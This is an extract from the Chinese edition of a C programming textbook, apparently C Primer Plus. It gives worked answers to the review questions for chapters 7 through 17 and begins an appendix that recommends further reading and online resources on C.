You are 65.Here is your gold watch. 
问题出在这一行:if (age = 65) 这行代码把age设置为65,使得每次迭代的测试条件都为真。 9.下面是根据给定输入的运行结果: q Step 1 Step 2 Step 3 c Step 1 h Step 1 Step 3 b Step 1 Done 注意,b和#都可以结束循环。但是输入b会使得程序打印step 1,而输入 #则不会。 1478 10.下面是一种解决方案: #include <stdio.h> int main(void) { char ch; while ((ch = getchar()) != '#') { if (ch != '\n') { printf("Step 1\n"); if (ch == 'b') break; else if (ch != 'c') { if (ch != 'h') printf("Step 2\n"); printf("Step 3\n"); } } 1479 } printf("Done\n"); return 0; } A.8 第8章复习题答案 1.表达式 putchar(getchar())使程序读取下一个输入字符并打印出来。 getchar()的返回值是putchar()的参数。但getchar(putchar())是无效的表达式, 因为getchar()不需要参数,而putchar()需要一个参数。 2.a.显示字符H。 b.如果系统使用ASCII,则发出一声警报。 c.把光标移至下一行的开始。 d.退后一格。 3.count <essay >essayct或者count >essayct <essay 4.都不是有效的命令。 5.EOF是由getchar()和scanf()返回的信号(一个特殊值),表明函数检测 到文件结尾。 6.a.输出是:If you qu 注意,字符I与字符i不同。还要注意,没有打印i,因为循环在检测到i 之后就退出了。 b.如果系统使用ASCII,输出是:HJacrthjacrt 1480 while的第1轮迭代中,为ch读取的值是H。第1个putchar()语句使用的ch 的值是H,打印完毕后,ch的值加1(现在是ch的值是I)。然后到第2个 putchar()语句,因为是++ch,所以先递增ch(现在ch的值是J)再打印它的 值。然后进入下一轮迭代,读取输入序列中的下一个字符(a),重复以上 步骤。需要注意的是,两个递增运算符只在ch被赋值后影响它的值,不会让 程序在输入序列中移动。 7.C的标准I/O库把不同的文件映射为统一的流来统一处理。 8.数值输入会跳过空格和换行符,但是字符输入不会。假设有下面的代 码: int score; char grade; printf("Enter the score.\n"); scanf("%s", %score); printf("Enter the letter grade.\n"); grade = getchar(); 如果输入分数98,然后按下Enter键把分数发送给程序,其实还发送了 一个换行符。这个换行符会留在输入序列中,成为下一个读取的值 (grade)。如果在字符输入之前输入了数字,就应该在处理字符输入之前 添加删除换行符的代码。 A.9 第9章复习题答案 1.形式参数是定义在被调函数中的变量。实际参数是出现在函数调用中 的值,该值被赋给形式参数。可以把实际参数视为在函数调用时初始化形式 参数的值。 1481 2.a.void donut(int n) b.int gear(int t1, int t2) c.int guess(void) d.void stuff_it(double d, double *pd) 3.a.char n_to_char(int n) b.int digits(double x, int n) c.double * which(double * p1, double * p2) d.int random(void) 4. int sum(int a, int b) { return a + b; } 5.用double替换int即可: double sum(double a, double b) { return a + b; } 6.该函数要使用指针: 1482 void alter(int * pa, int * pb) { int temp; temp = *pa + *pb; *pb = *pa - *pb; *pa = temp; } 或者: void alter(int * pa, int * pb) { *pa += *pb; *pb = *pa - 2 * *pb; } 7.不正确。num应声明在salami()函数的参数列表中,而不是声明在函数 体中。另外,把count++改成num++。 8.下面是一种方案: int largest(int a, int b, int c) { int max = a; 1483 if (b > max) max = b; if (c > max) max = c; return max; } 9.下面是一个最小的程序,showmenu()和getchoice()函数分别是a和b的答 案。 #include <stdio.h> /* 声明程序中要用到的函数 */ void showmenu(void); int getchoice(int, int); int main() { int res; showmenu(); while ((res = getchoice(1, 4)) != 4) { printf("I like choice %d.\n", res); 1484 showmenu(); } printf("Bye!\n"); return 0; } void showmenu(void) { printf("Please choose one of the following:\n"); printf("1) copy files     2) move files\n"); printf("3) remove files    4) quit\n"); printf("Enter the number of your choice:\n"); } int getchoice(int low, int high) { int ans; int good; good = scanf("%d", &ans); while (good == 1 && (ans < low || ans > high)) { 1485 printf("%d is not a valid choice; try again\n", ans); showmenu(); scanf("%d", &ans); } if (good != 1) { printf("Non-numeric input."); ans = 4; } return ans; } A.10 第10章复习题答案 1.打印的内容如下: 8 8 4 4 0 0 2 2 2.数组ref有4个元素,因为初始化列表中的值是4个。 3.数组名ref指向该数组的首元素(整数8)。表达式ref + 1指向该数组的 1486 第2个元素(整数4)。++ref不是有效的表达式,因为ref是一个常量,不是 变量。 4.ptr指向第1个元素,ptr + 2指向第3个元素(即第2行的第1个元素)。 a.12和16。 b.12和14(初始化列表中,用花括号把12括起来,把14和16括起来,所 以12初始化第1行的第1个元素,而14初始化第2行的第1个元素)。 5.ptr指向第1行,ptr + 1指向第2行。*ptr指向第1行的第1个元素,而*(ptr + 1)指向第2行的第1个元素。 a.12和16。 b.12和14(同第4题,12初始化第1行的第1个元素,而14初始化第2行的 第1个元素)。 6.a.&grid[22][56] b.&grid[22][0]或grid[22] (grid[22]是一个内含100个元素的一维数组,因此它就是首元素 grid[22][0]的地址。) c.&grid[0][0]或grid[0]或(int *) grid (grid[0]是int类型元素grid[0][0]的地址,grid是内含100个元素的grid[0] 数组的地址。 
这两个地址的数值相同,但是类型不同,可以用强制类型转换把它们转 换成相同的类型。) 7.a.int digits[10]; b.float rates[6]; 1487 c.int mat[3][5]; d.char * psa[20] ; 注意,[]比*的优先级高,所以在没有圆括号的情况下,psa先与[20]结 合,然后再与*结合。因此该声明与char *(psa[20]);相同。 e.char (*pstr)[20]; 注意 对第e小题而言,char *pstr[20];不正确。这会让pstr成为一个指针数组, 而不是一个指向数组的指针。具体地说,如果使用该声明,pstr就指向一个 char类型的值(即数组的第1个成员),而pstr + 1则指向下一个字节。使用 正确的声明,pstr是一个变量,而不是一个数组名。而且pstr+ 1指向起始字 节后面的第20个字节。 8.a.int sextet[6] = {1, 2, 4, 8, 16, 32}; b.sextet[2] c.int lots[100] = { [99] = -1}; d.int pots[100] = { [5] = 101, [10] = 101,101, 101, 101}; 9.0~9 10.a.rootbeer[2] = value;有效。 b.scanf("%f", &rootbeer );无效,rootbeer不是float类型。 c.rootbeer = value;无效,rootbeer不是float类型。 d.printf("%f", rootbeer);无效,rootbeer不是float类型。 e.things[4][4] = rootbeer[3];有效。 1488 f.things[5] = rootbeer;无效,不能用数组赋值。 g.pf = value;无效,value不是地址。 h.pf = rootbeer;有效。 11.int screen[800][600] ; 12.a. void process(double ar[], int n); void processvla(int n, double ar[n]); process(trots, 20); processvla(20, trots); b. void process2(short ar2[30], int n); void process2vla(int n, int m, short ar2[n][m]); process2(clops, 10); process2vla(10, 30, clops); c. void process3(long ar3[10][15], int n); void process3vla(int n, int m,int k, long ar3[n][m][k]); process3(shots, 5); process3vla(5, 10, 15, shots); 1489 13.a. show( (int [4]) {8,3,9,2}, 4); b. show2( (int [][3]){{8,3,9}, {5,4,1}}, 2); A.11 第11章复习题答案 1.如果希望得到一个字符串,初始化列表中应包含'\0'。当然,也可以用 另一种语法自动添加空字符: char name[] = "Fess"; 2. See you at the snack bar. ee you at the snack bar. See you e you 3. y my mmy ummy Yummy 1490 4.I read part of it all the way through. 5.a.Ho Ho Ho!!oH oH oH b.指向char的指针(即,char *)。 c.第1个H的地址。 d.*--pc的意思是把指针递减1,并使用储存在该位置上的值。--*pc的意 思是解引用pc指向的值,然后把该值减1(例如,H变成G)。 e.Ho Ho Ho!!oH oH o 注意 在两个!之间有一个空字符,但是通常该字符不会产生任何打印的效 果。 f.while (*pc)检查 pc 是否指向一个空字符(即,是否指向字符串的末 尾)。while 的测试条件中使用储存在指针指向位置上的值。 while (pc - str)检查pc是否与str指向相同的位置(即,字符串的开头)。 while的测试条件中使用储存在指针指向位置上的值。 g.进入第1个while循环后,pc指向空字符。进入第2个while循环后,它 指向空字符前面的存储区(即,str 所指向位置前面的位置)。把该字节解 释成一个字符,并打印这个字符。然后指针退回到前面的字节处。永远都不 会满足结束条件(pc == str),所以这个过程会一直持续下去。 h.必须在主调程序中声明pr():char * pr(char *); 6.字符变量占用一个字节,所以sign占1字节。但是字符常量储存为int类 型,意思是'$'通常占用2或4字节。但是实际上只使用int的1字节储存'$'的编 码。字符串"$"使用2字节:一个字节储存'$'的编码,一个字节储存的'\0'编 码。 1491 7.打印的内容如下: How are ya, sweetie? How are ya, sweetie? Beat the clock. eat the clock. Beat the clock.Win a toy. Beat chat hat at t t at How are ya, sweetie? 
8.打印的内容如下: faavrhee *le*on*sm 9.下面是一种方案: #include <stdio.h> // 提供fgets()和getchar()的原型 char * s_gets(char * st, int n) 1492 { char * ret_val; ret_val = fgets(st, n, stdin); if (ret_val) { while (*st != '\n' && *st != '\0') st++; if (*st == '\n') *st = '\0'; else while (getchar() != '\n') continue; } return ret_val; } 10.下面是一种方案: int strlen(const char * s) { int ct = 0; 1493 while (*s++)   // 或者while (*s++ != '\0') ct++; return(ct); } 11.下面是一种方案: #include <stdio.h>   // 提供 fgets()和getchar()的原型 #include <string.h>  // 提供 strchr()的原型 char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)          // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') 1494 continue; } return ret_val; } 12.下面是一种方案: #include <stdio.h>  /* 提供 NULL 的定义 */ char * strblk(char * string) { while (*string != ' ' && *string != '\0') string++;    /* 在第1个空白或空字符处停止 */ if (*string == '\0') return NULL;   /* NULL 指空指针 */ else return string; } 下面是第2种方案,可以防止函数修改字符串,但是允许使用返回值改 变字符串。表达式(char*)string被称为“通过强制类型转换取消const”。 #include <stdio.h>  /*提供 NULL 的定义*/ char * strblk(const char * string) 1495 { while (*string != ' ' && *string != '\0') string++;    /*在第1个空白或空字符处停止*/ if (*string == '\0') return NULL;   /* NULL 指空指针*/ else return (char *)string; } 13.下面是一种方案: /* compare.c -- 可行方案 */ #include <stdio.h> #include <string.h> // 提供strcmp()的原型 #include <ctype.h> #define ANSWER "GRANT" #define SIZE 40 char * s_gets(char * st, int n); void ToUpper(char * str); int main(void) { 1496 char try[SIZE]; puts("Who is buried in Grant's tomb?"); s_gets(try, SIZE); ToUpper(try); while (strcmp(try, ANSWER) != 0) { puts("No, that's wrong.Try again."); s_gets(try, SIZE); ToUpper(try); } puts("That's right!"); return 0; } void ToUpper(char * str) { while (*str != '\0') { *str = toupper(*str); str++; 1497 } } char * s_gets(char * st, int n) { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { while (st[i] != '\n' && st[i] != '\0') i++; if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; } return ret_val; } 1498 A.12 第12章复习题答案 1.自动存储类别;寄存器存储类别;静态、无链接存储类别。 2.静态、无链接存储类别;静态、内部链接存储类别;静态、外部链接 存储类别。 3.静态、外部链接存储类别可以被多个文件使用。静态、内部链接存储 类别只能在一个文件中使用。 4.无链接。 5.关键字extern用于声明中,表明该变量或函数已定义在别处。 6.两者都分配了一个内含100个int类型值的数组。第2行代码使用calloc() 把数组中的每个元素都设置为0。 7.默认情况下,daisy只对main()可见,以extern声明的daisy才对petal()、 stem()和root()可见。文件2中的extern int daisy;声明使得daisy对文件2中的所 有函数都可见。第1个lily是main()的局部变量。petal()函数中引用的lily是错 误的,因为两个文件中都没有外部链接的lily。虽然文件2中有一个静态的 lily,但是它只对文件2可见。第1个外部rose对root()函数可见,但是stem()中 的局部rose覆盖了外部的rose。 8.下面是程序的输出: color in main() is B color in first() is R color in main() is B color in second() is G color in main() is G 1499 first()函数没有使用color变量,但是second()函数使用了。 9.a.声明告诉我们,程序将使用一个变量plink,该文件包含的函数都可 以使用这个变量。calu_ct()函数的第1个参数是指向一个整数的指针,并假 定它指向内含n个元素的数组。这里关键是要理解该程序不允许使用指针arr 修改原始数组中的值。 b.不会。value和n已经是原始数据的备份,所以该函数无法更改主调函 数中相应的值。这些声明的作用是防止函数修改value和n的值。例如,如果 用const限定n,就不能使用n++表达式。 A.13 第13章复习题答案 1.根据文件定义,应包含#include <stdio.h>。应该把fp声明为文件指针: FILE *fp;。要给fopen()函数提供一种模式:fopen("gelatin","w"),或者"a"模 式。fputs()函数的参数顺序应该反过来。输出字符串应该有一个换行符,提 高可读性。fclose()函数需要一个文件指针,而不是一个文件名: fclose(fp);。下面是修改后的版本: #include <stdio.h> int main(void) { FILE * fp; int k; fp = fopen("gelatin", "w"); for (k = 0; k < 30; k++) fputs("Nanette eats gelatin.\n", fp); 1500 fclose(fp); return 0; } 2.如果可以打开的话,会打开与命令行第1个参数名相同名称的文件, 并在屏幕上显示文件中的每个数字字符。 3.a.ch = getc(fp1); b.fprintf(fp2,"%c"\n",ch); c.putc(ch,fp2); d.fclose(fp1); /* 关闭terky文件 */ 注意 
fp1用于输入操作,因为它识别以读模式打开的文件。与此类似,fp2以 写模式打开文件,所以常用于输出操作。 4.下面是一种方案: #include <stdio.h> #include <stdlib.h> int main(int argc, char * argv []) { FILE * fp; double n; double sum = 0.0; 1501 int ct = 0; if (argc == 1) fp = stdin; else if (argc == 2) { if ((fp = fopen(argv[1], "r")) == NULL) { fprintf(stderr, "Can't open %s\n", argv[1]); exit(EXIT_FAILURE); } } else { fprintf(stderr, "Usage: %s [filename]\n", argv[0]); exit(EXIT_FAILURE); } while (fscanf(fp, "%lf", &n) == 1) { sum += n; 1502 ++ct; } if (ct > 0) printf("Average of %d values = %f\n", ct, sum / ct); else printf("No valid data.\n"); return 0; } 5.下面是一种方案: #include <stdio.h> #include <stdlib.h> #define BUF 256 int has_ch(char ch, const char * line); int main(int argc, char * argv []) { FILE * fp; char ch; char line[BUF]; if (argc != 3) 1503 { printf("Usage: %s character filename\n", argv[0]); exit(EXIT_FAILURE); } ch = argv[1][0]; if ((fp = fopen(argv[2], "r")) == NULL) { printf("Can't open %s\n", argv[2]); exit(EXIT_FAILURE); } while (fgets(line, BUF, fp) != NULL) { if (has_ch(ch, line)) fputs(line, stdout); } fclose(fp); return 0; } int has_ch(char ch, const char * line) 1504 { while (*line) if (ch == *line++) return(1); return 0; } fgets()和 fputs()函数要一起使用,因为 fgets()会把按下 Enter 键的\n 留在 字符串中, fputs()与puts()不一样,不会添加一个换行符。 6.二进制文件与文本文件的区别是,这两种文件格式对系统的依赖性不 同。二进制流和文本流的区别包括是在读写流时程序执行的转换(二进制流 不转换,而文本流可能要转换换行符和其他字符)。 7.a.用fprintf()储存8238201时,将其视为7个字符,保存在7字节中。用 fwrite()储存时,使用该数的二进制表示,将其储存为一个4字节的整数。 b.没有区别。两个函数都将其储存为一个单字节的二进制码。 8.第1条语句是第2条语句的速记表示。第3条语句把消息写到标准错误 上。通常,标准错误被定向到与标准输出相同的位置。但是标准错误不受标 准输出重定向的影响。 9.可以在以"r+"模式打开的文件中读写,所以该模式最合适。"a+"只允 许在文件的末尾添加内容。"w+"模式提供一个空文件,丢弃文件原来的内 容。 A.14 第14章复习题答案 1.正确的关键是 struct,不是 structure。该结构模板要在左花括号前面有 1505 一个标记,或者在右花括号后面有一个结构变量名。另外,*togs后面和模 板结尾处都少一个分号。 2.输出如下: 6 1 22 Spiffo Road S p 3. struct month { char name[10]; char abbrev[4]; int days; int monumb; }; 4. struct month months[12] = { { "January", "jan", 31, 1 }, { "February", "feb", 28, 2 }, { "March", "mar", 31, 3 }, 1506 { "April", "apr", 30, 4 }, { "May", "may", 31, 5 }, { "June", "jun", 30, 6 }, { "July", "jul", 31, 7 }, { "August", "aug", 31, 8 }, { "September", "sep", 30, 9 }, { "October", "oct", 31, 10 }, { "November", "nov", 30, 11 }, { "December", "dec", 31, 12 } }; 5. extern struct month months []; int days(int month) { int index, total; if (month < 1 || month > 12) return(-1); /* error signal */ else { 1507 for (index = 0, total = 0; index < month; index++) total += months[index].days; return(total); } } 注意,index比月数小1,因为数组下标从0开始。然后,用index < month 代替index <= month。 6.a.要包含string.h头文件,提供strcpy()的原型: typedef struct lens { /* lens 描述 */ float foclen;   /* 焦距长度,单位:mm */ float fstop;    /* 孔径 */ char brand[30];/* 品牌 */ } LENS; LENS bigEye[10]; bigEye[2].foclen = 500; bigEye[2].fstop = 2.0; strcpy(bigEye[2].brand, "Remarkatar"); b.LENS bigEye[10] = { [2] = {500, 2, "Remarkatar"} }; 7.a. 
1508 6 Arcturan cturan b.使用结构名和指针: deb.title.last pb->title.last c.下面是一个版本: #include <stdio.h> #include "starfolk.h"   /* 让结构定义可用 */ void prbem (const struct bem * pbem ) { printf("%s %s is a %d-limbed %s.\n", pbem->title.first, pbem->title.last, pbem->limbs, pbem->type); } 8.a.willie.born b.pt->born c.scanf("%d", &willie.born); d.scanf("%d", &pt->born); e.scanf("%s", willie.name.lname); 1509 f.scanf("%s", pt->name.lname); g.willie.name.fname[2] h.strlen(willie.name.fname) + strlen(willie.name.lname) 9.下面是一种方案: struct car { char name[20]; float hp; float epampg; float wbase; int year; }; 10.应该这样建立函数: struct gas { float distance; float gals; float mpg; }; struct gas mpgs(struct gas trip) { 1510 if (trip.gals > 0) trip.mpg = trip.distance / trip.gals; else trip.mpg = -1.0; return trip; } void set_mpgs(struct gas * ptrip) { if (ptrip->gals > 0) ptrip->mpg = ptrip->distance / ptrip->gals; else ptrip->mpg = -1.0; } 注意,第1个函数不能直接改变其主调程序中的值,所以必须用返回值 才能传递信息。 struct gas idaho = {430.0, 14.8};  // 设置前两个成员 idaho = mpgs(idaho);        // 重置数据结构 但是,第2个函数可以直接访问最初的结构: struct gas ohio = {583, 17.6};   //设置前两个成员 1511 set_mpgs(&ohio);          // 设置第3个成员 11.enum choices {no, yes, maybe}; 12.char * (*pfun)(char *, char); 13. double sum(double, double); double diff(double, double); double times(double, double); double divide(double, double); double (*pf1[4])(double, double) = {sum, diff, times, divide}; 或者用更简单的形式,把代码中最后一行替换成: typedef double (*ptype) (double, double); ptype pfl[4] = {sum,diff, times, divide}; 调用diff()函数: pf1[1](10.0, 2.5);   // 第1种表示法 (*pf1[1])(10.0, 2.5); // 等价表示法 A.15 第15章复习题答案 1.a.00000011 b.00001101 c.00111011 1512 d.01110111 2.a.21, 025, 0x15 b.85, 0125, 0x55 c.76, 0114, 0x4C d.157, 0235, 0x9D 3.a.252 b.2 c.7 d.7 e.5 f.3 g.28 4.a.255 b.1 (not false is true) c.0 d.1 (true and true is true) e.6 f.1 (true or true is true) g.40 1513 5.掩码的二进制是1111111;十进制是127;八进制是0177;十六进制是 0x7F。 6.bitval * 2和bitval << 1都把bitval的当前值增加一倍,它们是等效的。 但是mask +=bitval和mask |= bitval只有在bitval和mask没有同时打开的位时效 果才相同。例如, 2 | 4得6,但是3 | 6也得6。 7.a. struct tb_drives { unsigned int diskdrives  : 2; unsigned int       : 1; unsigned int cdromdrives : 2; unsigned int       : 1; unsigned int harddrives  : 2; }; b. struct kb_drives { unsigned int harddrives  : 2; unsigned int       : 1; unsigned int cdromdrives : 2; unsigned int       : 1; unsigned int diskdrives  : 2; 1514 }; A.16 第16章复习题答案 1.a.dist = 5280 * miles;有效。 b.plort = 4 * 4 + 4;有效。但是如果用户需要的是4 * (4 + 4),则应该使用 #define POD (FEET + FEET)。 c.nex = = 6;;无效(如果两个等号之间没有空格,则有效,但是没有意 义)。显然,用户忘记了在编写预处理器代码时不用加=。 d.y = y + 5;有效。berg = berg + 5 * lob;有效,但是可能得不到想要的结 果。est = berg +5/y + 5;有效,但是可能得不到想要的结果。 2.#define NEW(X) ((X) + 5) 3.#define MIN(X,Y) ( (X) < (Y) ? (X) : (Y) ) 4.#define EVEN_GT(X,Y) ( (X) > (Y) && (X) % 2 == 0 ? 1 : 0 ) 5.#define PR(X,Y) printf(#X " is %d and " #Y " is %d\n", X,Y) (因为该宏中没有运算符(如,乘法)作用于X和Y,所以不需要使用 圆括号。) 6.a.#define QUARTERCENTURY 25 b.#define SPACE ' ' c.#define PS() putchar(' ')或#define PS() putchar(SPACE) d.#define BIG(X) ((X) + 3) e.#define SUMSQ(X,Y) ((X)*(X) + (Y)*(Y)) 1515 7.试试这样:#define P(X) printf("name: "#X"; value: %d; address: %p\n", X, &X) (如果你的实现无法识别地址专用的%p转换说明,可以用%u或%lu 代替。) 8.使用条件编译指令。一种方法是使用#ifndef: #define _SKIP_ /* 如果不需要跳过代码,则删除这条指令 */ #ifndef _SKIP_ /* 需要跳过的代码 */ #endif 9. 
#ifdef PR_DATE printf("Date = %s\n", _ _DATE_ _); #endif 10.第1个版本返回x*x,这只是返回了square()的double类型值。例如, square(1.3)会返回1.69。第2个版本返回 (int)(x*x),计算结果被截断后返回。 但是,由于该函数的返回类型是double,int类型的值将被升级为double类型 的值,所以1.69将先被转换成1,然后被转换成1.00。第3个版本返回(int) (x*x+0.5)。加上 0.5可以让函数把结果四舍五入至与原值最接近的值,而不 是简单地截断。所以,1.69+0.5得2.19,然后被截断为2,然后被转换成 2.00;而1.44+0.5得1.94,被截断为1,然后被转换成1.00。 11.这是一种方案: #define BOOL(X) _Generic((X), _Bool : "boolean", default : "not boolean")12.应该把argv参数声明为char *argv[]类型。命令行参 数被储存为字符串,所以该程序应该先把argv[1]中的字符串转换成double类 型的值。例如,用stdlib.h库中的atof()函数。程序中使用了sqrt()函数,所以 应包含math.h头文件。程序在求平方根之前应排除参数为负的情况(检查参 1516 数是否大于或等于0)。 13.a.qsort( (void *)scores, (size_t) 1000, sizeof (double), comp); b.下面是一个比较使用的比较函数: int comp(const void * p1, const void * p2) { /* 要用指向int的指针来访问值 */ /* 在C中是否进行强制类型转换都可以,在C++中必须进行强制类型转 换 */ const int * a1 = (const int *) p1; const int * a2 = (const int *) p2; if (*a1 > *a2) return -1; else if (*a1 == *a2) return 0; else return 1; } 14.a.函数调用应该类似:memcpy(data1, data2, 100 * sizeof(double)); b.函数调用应该类似:memcpy(data1, data2 + 200 , 100 * sizeof(double)); 1517 A.17 第17章复习题答案 1.定义一种数据类型包括确定如何储存数据,以及设计管理该数据的一 系列函数。 2.因为每个结构包含下一个结构的地址,但是不包含上一个结构的地 址,所以这个链表只能沿着一个方向遍历。可以修改结构,在结构中包含两 个指针,一个指向上一个结构,一个指向下一个结构。当然,程序也要添加 代码,在每次新增结构时为这些指针赋正确的地址。 3.ADT是抽象数据类型,是对一种类型属性集和可以对该类型进行的操 作的正式定义。ADT应该用一般语言表示,而不是用某种特殊的计算机语 言,而且不应该包含实现细节。 4.直接传递变量的优点:该函数查看一个队列,但是不改变其中的内 容。直接传递队列变量,意味着该函数使用的是原始队列的副本,这保证了 该函数不会更改原始的数据。直接传递变量时,不需要使用地址运算符或指 针。 直接传递变量的缺点:程序必须分配足够的空间储存整个变量,然后拷 贝原始数据的信息。如果变量是一个大型结构,用这种方法将花费大量的时 间和内存空间。 传递变量地址的优点:如果待传递的变量是大型结构,那么传递变量的 地址和访问原始数据会更快,所需的内存空间更少。 传递变量地址的缺点:必须记得使用地址运算符或指针。在K&R C中, 函数可能会不小心改变原 始数据,但是用ANSI C中的const限定符可以解决这个问题。 5.a. 类型名:    栈 1518 类型属性:   可以储存有序项 类型操作:   初始化栈为空 确定栈是否为空 确定栈是否已满 从栈顶添加项(压入项) 从栈顶删除项(弹出项) b.下面以数组形式实现栈,但是这些信息只影响结构定义和函数定义的 细节,不会影响函数原型的接口。 /* stack.h –– 栈的接口 */ #include <stdbool.h> /* 在这里插入 Item 类型 */ /* 例如: typedef int Item; */ #define MAXSTACK 100 typedef struct stack { Item items[MAXSTACK];  /* 储存信息    */ int top;       /* 第1个空位的索引 */ } Stack; /* 操作:   初始化栈                 */ 1519 /* 前提条件:  ps 指向一个栈               */ /* 后置条件:  该栈被初始化为空              */ void InitializeStack(Stack * ps); /* 操作:   检查栈是否已满              */ /* 前提条件:  ps 指向之前已被初始化的栈          */ /* 后置条件:  如果栈已满,该函数返回true;否则,返回false   */ bool FullStack(const Stack * ps); /* 操作:   检查栈是否为空              */ /* 前提条件:  ps 指向之前已被初始化的栈          */ /* 后置条件:  如果栈为空,该函数返回true;否则,返回false   */ bool EmptyStack(const Stack *ps); /* 操作:   把项压入栈顶               */ /* 前提条件:  ps 指向之前已被初始化的栈          */ /*      item 是待压入栈顶的项            */ /* 后置条件:  如果栈不满,把 item 放在栈顶,该函数返回ture;  */ /*      否则,栈不变,该函数返回 false        */ bool Push(Item item, Stack * ps); 1520 /* 操作:   从栈顶删除项               */ /* 前提条件:  ps 指向之前已被初始化的栈          */ /* 后置条件:  如果栈不为空,把栈顶的item拷贝到*pitem,    */ /*    删除栈顶的item,该函数返回ture;         */ /*    如果该操作后栈中没有项,则重置该栈为空。       */ /*    如果删除操作之前栈为空,栈不变,该函数返回false    */ bool Pop(Item *pitem, Stack * ps); 6.比较所需的最大次数如下: 7.见图A.1。 1521 图A.1 单词的二分查找树 8.见图A.2。 1522 图A.2 删除项后的单词二分查找树 [1].这句英文翻译成中文是“这句话是出色的捷克人”。显然不知所云,这就 是语言中的语义错误。——译者注 [2].thrice_n本应表示n的3倍,但是3 + n表示的并不是n的3倍,应该用3*n来表 示。——译者注 1523 附录B 参考资料 本书这部分总结了C语言的基本特性和一些特定主题的详细内容,包括 以下9个部分。 参考资料I:补充阅读 参考资料II:C运算符 参考资料III:基本类型和存储类别 参考资料IV:表达式、语句和程序流 参考资料V:新增了C99和C11的标准ANSI C库 参考资料VI:扩展的整数类型 参考资料VII:扩展的字符支持 参考资料VIII:C99/C11数值计算增强 参考资料IX:C与C++的区别 1524 B.1 参考资料I:补充阅读 如果想了解更多C语言和编程方面的知识,下面提供的资料会对你有所 帮助。 B.1.1 在线资源 C程序员帮助建立了互联网,而互联网可以帮助你学习C。互联网时刻 都在发展、变化,这里所列的资源只是在撰写本书时可用的资源。当然,你 可以在互联网中找到其他资源。 如果有一些与C语言相关的问题或只是想扩展你的知识,可以浏览C FAQ(常见问题解答)的站点: c-faq.com 但是,这个站点的内容主要涵盖到C89。 
如果对C库有疑问,可以访问这个站点获得信息: www.acm.uiuc.edu/webmonkeys/book/c_guide/index.html。 这个站点全面讨论指针:pweb.netcom.com/~tjensen/ptr/pointers.htm。 还可以使用谷歌和雅虎的搜索引擎,查找相关文章和站点: www.google.com search.yahoo.com www.bing.com 可以使用这些站点中的高级搜索特性来优化你要搜索的内容。例如,尝 试搜索C教程。 你可以通过新闻组(newsgroup)在网上提问。通常,新闻组阅读程序 1525 通过你的互联网服务提供商提供的账号访问新闻组。另一种访问方法是在网 页浏览器中输入这个地址:http://groups.google.com。 你应该先花时间阅读新闻组,了解它涵盖了哪些主题。例如,如果你对 如何使用C语言完成某事有疑问,可以试试这些新闻组: comp.lang.c comp.lang.c.moderated 可以在这里找到愿意提供帮助的人。你所提的问题应该与标准 C 语言 相关,不要在这里询问如何在UNIX系统中获得无缓冲输入之类的问题。特 定平台都有专门的新闻组。最重要的是,不要询问他们如何解决家庭作业中 的问题。 如果对C标准有疑问,试试这个新闻组:comp.std.c。但是,不要在这里 询问如何声明一个指向三维数组的指针,这类问题应该到另一个新闻组: comp.lang.c。 最后,如果对C语言的历史感兴趣,可以浏览下C创始人Dennis Ritchie 的站点,其中1993年中有一篇文章介绍了C的起源和发展:cm.bell- labs.com/cm/cs/who/dmr/chist.html。 B.1.2 C语言书籍 Feuer,Alan R.The C Puzzle Book,Revised Printing Upper Saddle River, NJ: Addison-WesleyProfessional, 1998。这本书包含了许多程序,可以用来学 习,推测这些程序应输出的内容。预测输出对测试和扩展 C 的理解很有帮 助。本书也附有答案和解释。 Kernighan, Brian W.and Dennis M.Ritchie.The C Programming Language, Second Edition .Englewood Cliffs, NJ: Prentice Hall, 1988。第1本C语言书的第 2版(注意,作者Dennis Ritchie是C的创始者)。本书的第1版给出了K&R C 的定义,许多年来它都是非官方的标准。第2版基于当时的ANSI草案进行了 1526 修订,在编写本书时该草案已成为了标准。本书包含了许多有趣的例子,但 是它假定读者已经熟悉了系统编程。 Koenig,Andrew.C Traps and Pitfalls.Reading,MA:Addison-Wesley,1989。本 书的中文版《C陷阱与缺陷》已由人民邮电出版社出版。 Summit,Steve.C Programming FAQs.Reading,MA:Addison-Wesley,1995。这 本书是互联网FAQ的延伸阅读版本。 B.1.3 编程书籍 Kernighan, Brian W.and P.J.Plauger.The Elements of Programming Style, Second Edition .NewYork:McGraw-Hill, 1978。这本短小精悍的绝版书籍,历 经岁月却无法掩盖其真知灼见。书中介绍了要编写高效的程序,什么该做, 什么不该做。 Knuth,Donald E.The Art of Computer Programming, 第1卷(基本算法), Third Edition.Reading,MA:Addison-Wesley, 1997。这本经典的标准参考书非常 详尽地介绍了数据表示和算法分析。第2卷(半数学算法,1997)探讨了伪 随机数。第 3 卷(排序和搜索,1998)介绍了排序和搜索,以伪代码和汇编 语言的形式给出示例。 Sedgewick, Robert.Algorithms in C, Parts 1-4:Fundamentals,Data Structures,Sorting,Searching,Third Edition.Reading, MA: Addison-Wesley Professional, 1997。顾名思义,这本书介绍了数据结构、排序和搜索。本书 中文版《C算法(第1卷)基础、数据结构、排序和搜索(第3版)》已由人 民邮电出版社出版。 B.1.4 参考书籍 Harbison, Samuel P.and Steele, Guy L.C: A Reference Manual, Fifth Edition.Englewood Cliffs,NJ:Prentice Hall, 2002。这本参考手册介绍了C语言 的规则和大多数标准库函数。它结合了C99,提供了许多例子。《C语言参 1527 考手册(第5版)(英文版)》已由人民邮电出版社出版。 Plauger,P.J.The Standard C Library.Englewood Cliffs,NJ:Prentice Hall,1992。这本大型的参考手册介绍了标准库函数,比一般的编译器手册更 详尽。 The International C Standard.ISO/IEC 9899:2011。在撰写本书时,可以花 285美元从www.ansi.org下载该标准的电子版,或者花238欧元从IEC下载。 别指望通过这本书学习C语言,因为它并不是一本学习教程。这是一句有代 表性的话,可见一斑:“如果在一个翻译单元中声明一个特定标识符多次, 在该翻译单元中都可见,那么语法可根据上下文无歧义地引用不同的实 体”。 B.1.5 C++书籍 Prata,Stephen.C++Primer Plus,Sixth Edition.Upper Saddle River,NJ:Addison- Wesley,2012。本书介绍了C++语言(C++11标准)和面向对象编程的原则。 Stroustrup, Bjarne.The C++Programming Language, Fourth Edition.Reading, MA: Addison-Wesley, 2013。本书由C++的创始人撰写,介绍了C++11标准。 1528 B.2 参考资料II:C运算符 